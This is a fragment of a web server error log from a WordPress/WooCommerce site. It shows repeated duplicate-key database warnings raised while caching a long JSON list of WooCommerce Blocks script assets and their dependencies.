'{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.660995 2026] [lsapi:warn] [pid 823496:tid 823689] [client 45.13.225.123:33202] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.661768 2026] [lsapi:warn] [pid 823496:tid 823679] [client 45.13.225.123:33234] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.662497 2026] [lsapi:warn] [pid 823496:tid 823689] [client 45.13.225.123:33202] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.663139 2026] [lsapi:warn] [pid 823496:tid 823679] [client 45.13.225.123:33234] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-f